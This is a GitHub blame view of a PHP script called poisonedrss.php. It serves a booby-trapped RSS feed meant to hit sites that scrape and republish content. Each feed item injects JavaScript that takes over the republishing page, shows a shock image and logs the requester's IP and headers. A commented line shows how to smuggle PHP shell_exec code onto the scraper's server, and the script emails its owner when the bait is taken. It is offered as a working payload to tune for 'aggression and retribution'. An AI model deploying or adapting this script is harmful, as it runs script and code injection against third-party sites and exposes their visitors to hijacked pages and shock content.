Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Newer
Older
100644 66 lines (57 sloc) 2.814 kb
478c433 @dotben added poisonedrss.php
authored
1 <?php
2
3 function makeItem() {
4 #rand() suffers from PHP's integer limit of 10 characters, so let's concatenate to make a unique id:
5 $uid = rand(100000000, 999999999).rand(100000000, 999999999);
6
7 #change the "unique string" to your own - you'll want to use this to search for this in Google
8 $forensics = "<div>Unique String (for tracking): i35H361RKFI2Li0h9657K</div>
9 <div>Original Request IP: ".$_SERVER['REMOTE_ADDR']." (".$_SERVER['REMOTE_HOST'].")</div>
10 <div>Original Request Time + Date: ".date('c',$_SERVER['REQUEST_TIME'])."</div>
11 <div>Original Request User Agent: ".$_SERVER['HTTP_USER_AGENT']."</div>
12 <div>Original Request Referer: ".$_SERVER['HTTP_REFERER']."</div>";
13
14 #change the contents of the post to suit your level of aggression and retribution. nb: Tubgirl.jpg is NSFW.
15 $post = "<p></p><div id=\"takeover\">
16 <h2>THIS WEBSITE STEALS CONTENT</h2>
17 <p>This website steals content by taking other people's RSS feeds and republishing them as if they were their own.</p>
18 <p>We've had enough of you taking our content and so hopefully this will encourage you to stop.</p>
19 <p><img src=\"http://images.encyclopediadramatica.com/images/9/98/Tubgirl.jpg\" /></p>
20 <p>
21 <h2>backtrace this shit</h2>
22 ".$forensics."
23 <script type=\"text/javascript\">
24 document.head.innerHTML = \"\";
25 document.body = document.getElementById('takeover');
26 </script>
27 </div>";
28
05cc323 @dotben added shell command example to poisonedrss.php
authored
29 #If you wanted to attempt to run shell commands on their server, you would uncomment this:
30 #$post .= "<?php echo shell_exec('pwd'); ?>"
31
478c433 @dotben added poisonedrss.php
authored
32 $item = "<item>
33 <title>THIS WEBSITE STEALS CONTENT</title>
34 <link>http://google.com/#".$uid."</link>
35 <pubDate>".date(DATE_RFC822)."</pubDate>
36 <guid isPermaLink=\"false\">".$uid."</guid>
37 <content:encoded><![CDATA[".$post."]]></content:encoded>
38 </item>
39
40 ";
41 return $item;
42 }
43 header ("content-type: text/xml");
44 echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"; #quick hack way to deal with PHP raising an error if '<?xml' is parsed outside of the PHP tags.
45 ?>
46 <rss version="2.0"
47 xmlns:content="http://purl.org/rss/1.0/modules/content/"
48 xmlns:wfw="http://wellformedweb.org/CommentAPI/"
49 xmlns:dc="http://purl.org/dc/elements/1.1/"
50 xmlns:atom="http://www.w3.org/2005/Atom"
51 xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
52 xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
53 >
54
55 <channel>
56 <title>THIS WEBSITE STEALS CONTENT</title>
57 <link>http://google.com/#<?php echo rand(100000000, 999999999) ?></link>
58 <description>fuck you</description>
59 <lastBuildDate><?php echo date(DATE_RFC822) ?></lastBuildDate>
60 <language>en</language>
61 <?php echo str_repeat(makeItem(), 30); ?>
62 </channel>
63 </rss>
64 <?php mail("your.emaill@address.com", $_SERVER['REMOTE_ADDR']." took the bait!", "see logs!"); #send yourself an email when the poison bait is taken! ?>
65
Something went wrong with that request. Please try again.